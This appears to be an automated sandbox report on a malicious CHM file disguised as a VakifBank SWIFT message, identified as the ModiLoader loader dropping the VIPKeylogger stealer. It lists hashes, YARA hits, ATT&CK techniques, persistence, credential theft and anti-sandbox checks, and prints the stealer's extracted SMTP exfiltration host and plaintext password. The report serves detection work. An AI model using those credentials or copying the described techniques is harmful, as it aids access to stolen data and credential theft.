modiloader | 3956166deff9e06982e311687fd916327c004d13af4b3fbd01fb17e93c110591

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
27-01-2025 17:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

VakifBank_Swift_Mesaji.chm
Size

75KB
MD5

039c23eb3b3b9c7a83c8647b6fbbd029
SHA1

413a342f9ef90edb0fe4db38d655e6eab77a49ce
SHA256

3956166deff9e06982e311687fd916327c004d13af4b3fbd01fb17e93c110591
SHA512

4f45ff320239c81535347f66b44b57a74dc445278bc61e6fa25c48792e4fcd0d63f080d420457584c64df81d54c4198f8f84a8e331650cce874a32a0fe6c862e
SSDEEP

1536:PTjqBR0MKHC7+qFwItZR3BRRdos7xw9siuUKHj5Cs+0LtpZsAx+9+:7yeMKi7XpZR3BR899svd5ayt7nxf

Score

10^/10

modiloader vipkeylogger collection defense_evasion discovery execution keylogger persistence spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
lax029.hawkhost.com
Port:
587
Username:
[email protected]
Password:
london@1759

Extracted

Family

vipkeylogger

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger
Vipkeylogger family
vipkeylogger

ModiLoader Second Stage 61 IoCs

resource	yara_rule
behavioral2/memory/2960-50-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-56-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-55-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-59-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-66-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-77-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-94-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-114-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-113-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-112-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-111-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-110-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-109-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-108-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-107-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-106-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-104-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-101-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-99-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-97-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-92-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-87-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-105-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-84-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-82-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-103-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-102-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-81-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-100-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-80-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-79-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-98-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-78-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-96-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-93-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-76-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-75-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-91-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-90-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-74-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-89-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-88-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-73-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-86-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-72-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-85-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-71-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-83-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-70-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-69-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-68-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-67-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-65-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-64-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-63-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-62-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-61-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-60-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-57-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-58-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/2960-54-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3988	powershell.exe
3504	powershell.exe

Executes dropped EXE 32 IoCs

pid	Process
1820	ript.exe
2960	x.exe
4852	svchost.pif
4540	alpha.pif
324	Upha.pif
1372	alpha.pif
3112	Upha.pif
4732	alpha.pif
1560	aken.pif
3104	itimtjqI.pif
2480	alg.exe
1932	DiagnosticsHub.StandardCollector.Service.exe
5060	fxssvc.exe
2980	elevation_service.exe
3232	elevation_service.exe
5040	maintenanceservice.exe
5096	msdtc.exe
3532	OSE.EXE
2928	PerceptionSimulationService.exe
1624	perfhost.exe
2556	locator.exe
3048	SensorDataService.exe
2044	snmptrap.exe
4436	spectrum.exe
3316	ssh-agent.exe
4004	TieringEngineService.exe
3284	AgentService.exe
3492	vds.exe
4144	vssvc.exe
4388	wbengine.exe
560	WmiApSrv.exe
1548	SearchIndexer.exe

Loads dropped DLL 1 IoCs

pid	Process
4852	svchost.pif

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	itimtjqI.pif
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	itimtjqI.pif
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	itimtjqI.pif

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Iqjtmiti = "C:\\Users\\Public\\Iqjtmiti.url"	x.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
4728	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	drive.google.com
24	drive.google.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
83	reallyfreegeoip.org
51	checkip.dyndns.org
80	reallyfreegeoip.org

Drops file in System32 directory 24 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\wbem\WmiApSrv.exe	itimtjqI.pif
File opened for modification	C:\Windows\system32\AppVClient.exe	itimtjqI.pif
File opened for modification	C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe	itimtjqI.pif
File opened for modification	C:\Windows\SysWow64\perfhost.exe	itimtjqI.pif
File opened for modification	C:\Windows\system32\locator.exe	itimtjqI.pif
File opened for modification	C:\Windows\System32\SensorDataService.exe	itimtjqI.pif
File opened for modification	C:\Windows\system32\wbengine.exe	itimtjqI.pif
File opened for modification	C:\Windows\System32\alg.exe	itimtjqI.pif
File opened for modification	C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	itimtjqI.pif
File opened for modification	C:\Windows\system32\fxssvc.exe	itimtjqI.pif
File opened for modification	C:\Windows\System32\OpenSSH\ssh-agent.exe	itimtjqI.pif
File opened for modification	C:\Windows\System32\vds.exe	itimtjqI.pif
File opened for modification	C:\Windows\system32\TieringEngineService.exe	itimtjqI.pif
File opened for modification	C:\Windows\system32\AgentService.exe	itimtjqI.pif
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\53dea5f23e6c0d63.bin	alg.exe
File opened for modification	C:\Windows\System32\msdtc.exe	itimtjqI.pif
File opened for modification	C:\Windows\system32\msiexec.exe	itimtjqI.pif
File opened for modification	C:\Windows\system32\MSDtc\MSDTC.LOG	msdtc.exe
File opened for modification	C:\Windows\System32\snmptrap.exe	itimtjqI.pif
File opened for modification	C:\Windows\system32\spectrum.exe	itimtjqI.pif
File opened for modification	C:\Windows\system32\SearchIndexer.exe	itimtjqI.pif
File opened for modification	C:\Windows\system32\dllhost.exe	itimtjqI.pif
File opened for modification	C:\Windows\system32\SgrmBroker.exe	itimtjqI.pif
File opened for modification	C:\Windows\system32\vssvc.exe	itimtjqI.pif

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2960 set thread context of 3104	2960	x.exe	125

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\wsgen.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\rmid.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Mozilla Firefox\uninstall\helper.exe	itimtjqI.pif
File opened for modification	C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe	itimtjqI.pif
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateBroker.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javaw.exe	itimtjqI.pif
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateComRegisterShell64.exe	itimtjqI.pif
File opened for modification	C:\Program Files (x86)\Internet Explorer\iexplore.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Internet Explorer\iediagcmd.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\orbd.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\servertool.exe	itimtjqI.pif
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe	itimtjqI.pif
File opened for modification	C:\Program Files\7-Zip\7zG.exe	itimtjqI.pif
File opened for modification	C:\Program Files\7-Zip\Uninstall.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\kinit.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\java.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\pack200.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Mozilla Firefox\private_browsing.exe	itimtjqI.pif
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE	itimtjqI.pif
File opened for modification	C:\Program Files\dotnet\dotnet.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\keytool.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\ssvagent.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Mozilla Firefox\maintenanceservice.exe	itimtjqI.pif
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Internet Explorer\ExtExport.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Internet Explorer\ieinstal.exe	itimtjqI.pif
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javapackager.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jcmd.exe	itimtjqI.pif
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe	itimtjqI.pif
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateOnDemand.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Internet Explorer\iexplore.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jstack.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\unpack200.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Mozilla Firefox\updater.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\idlj.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\klist.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jabswitch.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome_pwa_launcher.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jinfo.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\rmid.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\wsimport.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\javaw.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\ktab.exe	itimtjqI.pif
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log	maintenanceservice.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jstatd.exe	itimtjqI.pif
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe	itimtjqI.pif
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe	itimtjqI.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\native2ascii.exe	itimtjqI.pif
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe	itimtjqI.pif

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	itimtjqI.pif
File opened for modification	C:\Windows\DtcInstall.log	msdtc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	itimtjqI.pif

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
